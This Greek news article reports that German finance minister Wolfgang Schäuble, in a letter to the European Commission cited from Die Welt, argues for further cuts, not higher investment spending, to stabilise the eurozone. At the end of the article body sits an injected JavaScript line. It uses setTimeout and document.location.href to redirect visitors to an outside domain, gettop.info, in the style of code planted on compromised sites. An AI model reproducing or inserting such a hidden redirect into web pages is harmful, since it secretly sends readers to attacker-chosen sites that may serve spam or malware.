Σόιμπλε: Περαιτέρω περικοπές και όχι αύξηση δαπανών, το αντίδοτο για τη σταθερότητα

0
11

 

«Δεν είναι πειστικές οι προτάσεις της Ευρωπαϊκής Επιτροπής για αύξηση των δαπανών για επενδύσεις. Η ευρωζώνη συνολικά έχει ελλείμματα και τα χρέη της σταθεροποιούνται σε υψηλό επίπεδο» αναφέρεται σε επιστολή του υπουργού Οικονομικών της Γερμανίας Βόλφγκανγκ Σόιμπλε προς την Κομισιόν, σύμφωνα με πληροφορίες της Die Welt.

«Μάλλον οι περαιτέρω περικοπές και όχι η αύξηση των δαπανών είναι η εγγύηση για να σταθεροποιηθεί μόνιμα η ευρωζώνη», αναφέρει στην επιστολή του ο Γερμανός ΥΠΟΙΚ.

Είναι «αντιπαραγωγικό» να θεωρούνται οι δαπάνες του προϋπολογισμού της ευρωζώνης συνολικά ως κοινή αξία πριν καν να ξεκινήσουν οι συζητήσεις για τις μεγάλες προκλήσεις, αναφέρεται επίσης σύμφωνα με τη γερμανική εφημερίδα.

«Η παρούσα διαδικασία και η ατζέντα αντανακλούν λάθος προτεραιότητες» όπως γράφει ο Σόιμπλε, ο οποίος επικρίνει επίσης την Ευρωπαϊκή Επιτροπή ότι «οι συστάσεις της αποσπούν την προσοχή από την αναγκαιότητα να επικεντρωθούμε σε βιώσιμα επίπεδα χρέους και αναπτυξιακές στρατηγικές σε όλες τις χώρες μέλη της Ευρωπαϊκής Ένωσης. Υψηλότερες δαπάνες σε μια ή δύο χώρες δε θα επέλυαν τα διαρθρωτικά προβλήματα και τους δημοσιονομικούς κινδύνους σε άλλες χώρες».

Αναγκαία είναι μια πολιτική η οποία να επικεντρώνεται σε υγιή δημοσιονομικά μεγέθη και διαρθρωτικές μεταρρυθμίσεις, σύμφωνα με τον Βόλφγκανγκ Σόιμπλε. Πάντως, εκπρόσωπος του υπουργείου αρνήθηκε να σχολιάσει την εσωτερική επικοινωνία του Σόιμπλε με την Κομισιόν.

Ο Γερμανός υπουργός Οικονομικών είχε επικρίνει τις Βρυξέλλες διότι κάνουν υπέρβαση αρμοδιοτήτων και επομένως παραβιάζουν, κατ’ αυτόν, το ευρωπαϊκό δίκαιο. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here